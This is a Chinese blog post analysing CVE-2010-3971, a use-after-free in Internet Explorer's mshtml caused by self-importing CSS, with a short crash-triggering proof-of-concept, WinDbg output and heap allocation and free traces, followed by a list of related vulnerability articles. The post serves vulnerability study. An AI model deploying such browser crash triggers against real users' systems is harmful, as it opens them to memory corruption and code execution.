看了仙果版主的议题演讲,其中提到cve-2010-3971是一个浏览器漏洞利用中的里程碑。于是找来POC,尝试分析一下。

1.漏洞重现

XP SP3+ie6.0环境

poc如下:

poc.htm

  1. <div style="position: absolute; top: -999px;left: -999px;">
  2. <link href="css.css" rel="stylesheet" type="text/css" />

css.css

  1. *{
  2. color:red;
  3. }
  4. @import url("css.css");
  5. @import url("css.css");
  6. @import url("css.css");
  7. @import url("css.css");

2.漏洞分析

首先来看漏洞的相关信息

可见是一个UAF漏洞。

用调试器加载POC,调试器断在异常处。用IDA加载mshtml.dll文件,异常位置如图红色部分

注意在这个函数里我们可以看到ecx寄存器未经任何处理就直接拿来使用,说明这是thiscall函数调用。而ecx也就是对象的this指针。

异常是由cmp dword ptr [ecx+14h],1 触发的,其中ecx地址不可读

而ecx的值由edi指定的。再往上看edi又是由[ecx+0b8h]得到的。

绕了这么一大圈,我们可以猜到:

ecx是this指针,edi是对象中的一个指针成员。

而由于UAF漏洞导致这个对象被释放了,所以对象中的数据已经不可靠了,所以这个指针就是个野指针了,所以就会产生异常了。

最近学到了UAF漏洞的要点是搞清楚三点:1.对象何时何处被分配? 2.对象何时何处被释放? 3.对象何时何处被重用?

这里触发异常明显就是因为被重用了。那么前两点的答案呢?我们继续分析。

我们理一理思路,考虑一下。此时这个函数发生异常,说明对象已经被释放了,说明释放操作就发生在当前步骤之前,就是说我们可以通过回溯找到释放的操作。

事实的结果是回溯不到那个释放的函数。说明我这个想法并不能成功,于是通过分析该对象(CStyleSheet)的方法来找出释放的位置。

因为我们知道要想释放这个对象肯定要使用这个对象自己的提供的方法,那么就可以通过对释放的方法下断点来实现。

重新分析这个漏洞,win7 x86 +ie8环境。加载poc,程序崩溃。挂载windbg,启用ust,开启子进程调试,发现异常信息如下。

  1. :> r
  2. eax= ebx=17ef8f90 ecx=7770316f edx= esi= edi=1817cff0
  3. eip=678b610d esp=045ed620 ebp=045ed62c iopl= nv up ei pl nz na pe nc
  4. cs=001b ss= ds= es= fs=003b gs= efl=
  5. mshtml!CSharedStyleSheet::Notify+0x1b:
  6. 678b610d 8b0f mov ecx,dword ptr [edi] ds::1817cff0=????????

看一下edi的来源问题,如下所示。可见edi来自于ecx+0xd8。又由于这是CSharedStyleSheet对象的一个方法函数,根据调用约定我们就可以知道,这个ecx就是对象的this指针。

  1. :> ub 678b610d
  2. mshtml!CSharedStyleSheet::Notify+0x6:
  3. 678b60f6 push esi
  4. 678b60f7 8bb1d0000000 mov esi,dword ptr [ecx+0D0h]
  5. 678b60fd push edi
  6. 678b60fe 8bb9d8000000 mov edi,dword ptr [ecx+0D8h]
  7. 678b6104 33c0 xor eax,eax
  8. 678b6106 c1ee02 shr esi,
  9. 678b6109 85f6 test esi,esi
  10. 678b610b 7e12 jle mshtml!CSharedStyleSheet::Notify+0x37 (678b611f)

为此,猜测edi是ecx对象的一个成员

  1. :> dc ecx
  2. 7770316f 900008c2 8508458b c6850fc0 .........E......
  3. 7770317f 8000034b 7400e67d ccb7ff0b e8000000 K...}..t........
  4. 7770318f ffff39ad 8c5d89c3 850fc085 fffffe26 .....].....&...
  5. 7770319f 870fda3b fffffe16 04b04583 8bb0458b ;........E...E..
  6. 777031af e1eb4300 00b06890 d8680000 .C.......h....h.
  7. 777031bf e8777008 ffff39f1 8bc45589 e05d89d9 .pw.....U....].
  8. 777031cf 8941c933 45c6bc4d ff3300df 89d07d89 .A.M..E....}..
  9. 777031df 7d89d87d 907d89a8 0f60c2f7 850f7d01 }..}..}...`..}..

为了验证我们的猜想我们来看一下分配记录,由分配的记录来看我们可以这个是CSharedStyleSheet对象,其实作为CSharedStyleSheet::Notify的this指针传进来的也只能是CSharedStyleSheet对象。

  1. :> !heap -p -a ecx
  2. address 17590f08 found in
  3. _DPH_HEAP_ROOT @
  4. in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
  5. 178624ac: 17590f08 f8 -
  6. mshtml!CSharedStyleSheet::`vftable'
  7. 77888e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
  8. 77774ea6 ntdll!RtlDebugAllocateHeap+0x00000030
  9. 77737d96 ntdll!RtlpAllocateHeap+0x000000c4
  10. 777034ca ntdll!RtlAllocateHeap+0x0000023a
  11. 685144dc mshtml!CSharedStyleSheet::Create+0x00000023
  12. 68513eaa mshtml!CStyleSheetArray::CreateNewStyleSheet+0x00000054
  13. 685266a7 mshtml!CLinkElement::HandleLinkedObjects+0x0000032f
  14. 68526576 mshtml!CLinkElement::Notify+0x0000011a
  15. 6850780a mshtml!CHtmRootParseCtx::FlushNotifications+0x000001bf
  16. 68506bb5 mshtml!CHtmRootParseCtx::Commit+0x0000000a
  17. 684f77cf mshtml!CHtmPost::Broadcast+0x0000000f
  18. 684f7924 mshtml!CHtmPost::Exec+0x00000255
  19. 684f8a99 mshtml!CHtmPost::Run+0x00000015
  20. 684f89fd mshtml!PostManExecute+0x000001fb
  21. 684f7c66 mshtml!PostManResume+0x000000f7
  22. 685113f6 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
  23. 684f53fc mshtml!CDwnChan::OnMethodCall+0x00000019
  24. 685994b2 mshtml!GlobalWndOnMethodCall+0x000000ff
  25. 685837f7 mshtml!GlobalWndProc+0x0000010c
  26. 774286ef USER32!InternalCallWinProc+0x00000023
  27. 77428876 USER32!UserCallWinProcCheckWow+0x0000014b
  28. 774289b5 USER32!DispatchMessageWorker+0x0000035e
  29. 77428e9c USER32!DispatchMessageW+0x0000000f
  30. 6b9104a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
  31. 6b920446 IEFRAME!LCIETab_ThreadProc+0x000002c1
  32. 76b749bd iertutil!CIsoScope::RegisterThread+0x000000ab
  33. 768b1174 kernel32!BaseThreadInitThunk+0x0000000e
  34. 7770b3f5 ntdll!__RtlUserThreadStart+0x00000070
  35. 7770b3c8 ntdll!_RtlUserThreadStart+0x0000001b

edi的内存是不可访的,如下所示

  1. :> ? edi
  2. Evaluate expression: = 1817cff0
  3. :> dc edi
  4. 1817cff0 ???????? ???????? ???????? ???????? ????????????????
  5. 1817d000 ???????? ???????? ???????? ???????? ????????????????
  6. 1817d010 ???????? ???????? ???????? ???????? ????????????????
  7. 1817d020 ???????? ???????? ???????? ???????? ????????????????
  8. 1817d030 ???????? ???????? ???????? ???????? ????????????????
  9. 1817d040 ???????? ???????? ???????? ???????? ????????????????
  10. 1817d050 ???????? ???????? ???????? ???????? ????????????????
  11. 1817d060 ???????? ???????? ???????? ???????? ????????????????
  12. :> !address edi
  13. ProcessParametrs in range 0005a000
  14. Environment 000577b0 in range
  15. : 1817c000 -
  16. Type MEM_PRIVATE
  17. Protect PAGE_NOACCESS
  18. State MEM_COMMIT
  19. Usage RegionUsageIsVAD

到这里其实有点迷茫,因为edi的内存属性不是未分配的,而是已经VAD分配的,但是却没有访问权限。那么看下是不是已释放导致的没有访问权限,也就是启用堆调试才会有的东西。
尝试!heap -p -a一下看看。如下,果然是已经释放的堆内存。

  1. :> !heap -p -a edi
  2. address 1817cff0 found in
  3. _DPH_HEAP_ROOT @
  4. in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
  5. 17e4298c: 1817c000 0b2 verifier!AVrfDebugPageHeapFree+0x000000c2
  6. ntdll!RtlDebugFreeHeap+0x0000002f
  7. 77737aca ntdll!RtlpFreeHeap+0x0000005d
  8. 77702d68 ntdll!RtlFreeHeap+0x00000142
  9. 76ef3cab ole32!MIDL_user_free+0x00000016
  10. 75ad0224 RPCRT4!NdrFreeTypeMemory+0x00000046
  11. 75abf26b RPCRT4!NdrPointerFree+0x000000a8
  12. 75b34e9e RPCRT4!NdrpFreeParams+0x00000145
  13. 75b34949 RPCRT4!NdrpCompleteAsyncServerCall+0x00000145
  14. 75b35494 RPCRT4!Ndr64pCompleteAsyncCall+0x00000084
  15. 75b35422 RPCRT4!RpcAsyncCompleteCall+0x0000001f
  16. 76ea21af ole32!_UpdateResolverBindings+0x00000052
  17. 75acfc8f RPCRT4!Invoke+0x0000002a
  18. 75b347ea RPCRT4!NdrAsyncServerCall+0x000001e4
  19. 75acf34a RPCRT4!DispatchToStubInCNoAvrf+0x0000004a
  20. 75b0fb70 RPCRT4!DispatchToStubInCAvrf+0x00000016
  21. 75acf4da RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x0000016c
  22. 75acf3c6 RPCRT4!RPC_INTERFACE::DispatchToStub+0x0000008b
  23. 75ac3974 RPCRT4!LRPC_SCALL::DispatchRequest+0x00000257
  24. 75acf7a4 RPCRT4!LRPC_SCALL::QueueOrDispatchCall+0x000000bd
  25. 75acf763 RPCRT4!LRPC_SCALL::HandleRequest+0x0000034f
  26. 75acf5ff RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x00000144
  27. 75acf573 RPCRT4!LRPC_ADDRESS::HandleRequest+0x000000bd
  28. 75acee4f RPCRT4!LRPC_ADDRESS::ProcessIO+0x0000050a
  29. 75acece7 RPCRT4!LrpcServerIoHandler+0x00000016
  30. 75ad1357 RPCRT4!LrpcIoComplete+0x00000016
  31. 776dd3a3 ntdll!TppAlpcpExecuteCallback+0x000001c5
  32. 776e0748 ntdll!TppWorkerThread+0x000005a4
  33. 768b1174 kernel32!BaseThreadInitThunk+0x0000000e
  34. 7770b3f5 ntdll!__RtlUserThreadStart+0x00000070
  35. 7770b3c8 ntdll!_RtlUserThreadStart+0x0000001b

附此漏洞的有关信息:

1.http://www.topsec.com.cn/aqtb/yjcg/ldyj/967.htm 天融信的分析报告

2.http://cve.scap.org.cn/cve-2010-3971.html SCAP的收录

CVE-2010-3971 CSS内存破坏漏洞分析的更多相关文章

  1. PHP Fileinfo组件越界内存破坏漏洞

    漏洞版本: PHP PHP 5.x 漏洞描述: BUGTRAQ ID: 66002 CVE(CAN) ID: CVE-2014-2270 PHP是一种HTML内嵌式的语言. PHP的file程序在解析 ...

  2. CVE-2013-3346Adobe Reader和Acrobat 内存损坏漏洞分析

    [CNNVD]Adobe Reader和Acrobat 内存损坏漏洞(CNNVD-201308-479) Adobe Reader和Acrobat都是美国奥多比(Adobe)公司的产品.Adobe R ...

  3. Microsoft Internet Explorer内存破坏漏洞(CVE-2013-5052)

    漏洞版本: Microsoft Internet Explorer 6-11 漏洞描述: BUGTRAQ ID: 64126 CVE(CAN) ID: CVE-2013-5052 Internet E ...

  4. Microsoft Internet Explorer 内存破坏漏洞(CVE-2013-3193)(MS13-059)

    漏洞版本: Microsoft Internet Explorer 6 - 10 漏洞描述: BUGTRAQ ID: 61678 CVE(CAN) ID: CVE-2013-3193 Windows ...

  5. CVE-2010-3974 Microsoft Windows多个平台Fax Cover Page Editor内存破坏漏洞

    Microsoft Windows Fax Cover Pages用于个性化传真以及呈现更正式外观的传真传输.         Microsoft Windows XP SP2和SP3,Windows ...

  6. Linux 内核 UFO-非UFO 路径切换内存破坏漏洞的 PoC(CVE-2017-1000112)

    // A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. ...

  7. CVE-2010-0249 IE8 UAF漏洞分析

    CVE-2010-0249 [CNNVD]Microsoft Internet Explorer非法事件操作内存破坏漏洞(CNNVD-201001-153) Microsoft Internet Ex ...

  8. Windows SMBv3 CVE-2020-0796 漏洞分析和l漏洞复现

    0x00  漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码.攻击者利用该漏洞无须权限即可实现远 ...

  9. CVE-2012-0003 Microsoft Windows Media Player ‘winmm.dll’ MIDI文件解析远程代码执行漏洞 分析

    [CNNVD]Microsoft Windows Media Player ‘winmm.dll’ MIDI文件解析远程代码执行漏洞(CNNVD-201201-110)    Microsoft Wi ...

随机推荐

  1. 【线段树】【P2572】【SCOI2010】序列操作

    Description lxhgww最近收到了一个01序列,序列里面包含了n个数,这些数要么是0,要么是1,现在对于这个序列有五种变换操作和询问操作: 0 a b 把[a, b]区间内的所有数全变成0 ...

  2. C之Volatile关键字的介绍与使用20170724

    volatile 的意思是“易失的,易改变的”. 一.volatile的引入 这个限定词的含义是向编译器指明变量的内容可能会由于其他程序的修改而变化.通常在程序中申明了一个变量时,编译器会尽量把它存放 ...

  3. js中字符串全部替换

    废话不多说,直接发结果 在js中字符串全部替换可以用以下方法: str.replace(/需要替换的字符串/g,"新字符串") 比如: "yyyy-MM-dd-hh-mm ...

  4. u3d图片转视频

    c#代码://将截图生成视频public static void createVideo(){ ProcessStartInfo psi = new ProcessStartInfo(); psi.F ...

  5. NOIP模拟赛14

    期望得分:0+100+100=200 实际得分:0+100+100=200 T1 [Ahoi2009]fly 飞行棋 http://www.lydsy.com/JudgeOnline/problem. ...

  6. CSS 定位相关属性 :position

    我们平时经常用margin来进行布局,但是遇到一些盒子不规律布局时,用margin就有点麻烦了,这个时候我们可以用position. position:参数 参数分析: 一.absolute: 相对父 ...

  7. 重构改善既有代码设计--重构手法04:Replace Temp with Query (以查询取代临时变量)

    所谓的以查询取代临时变量:就是当你的程序以一个临时变量保存某一个表达式的运算效果.将这个表达式提炼到一个独立函数中.将这个临时变量的所有引用点替换为对新函数的调用.此后,新函数就可以被其他函数调用. ...

  8. 重构改善既有代码设计--重构手法01:Extract Method (提炼函数)

    背景: 你有一段代码可以被组织在一起并独立出来.将这段代码放进一个独立函数,并让函数名称解释该函数的用途. void PrintOwing(double amount) { PrintBanner() ...

  9. 《JavaScript 实战》:实现图片幻滑动展示效果

    滑动展示效果主要用在图片或信息的滑动展示,也可以设置一下做成简单的口风琴(Accordion)效果.这个其实就是以前写的图片滑动展示效果的改进版,那是我第一篇比较受关注的文章,是时候整理一下了. 有如 ...

  10. [php]referer应用--http防盗链技术

    1.防盗链的理解 所谓防盗链是防止其他的网站引用自己网站的资源连接,比如图片.视频等等,但是并不会阻碍从自己网站上享受资源的用户,这就要求能够将其他网站的连接请求阻止 2.防盗链的原理 其实从自己网站 ...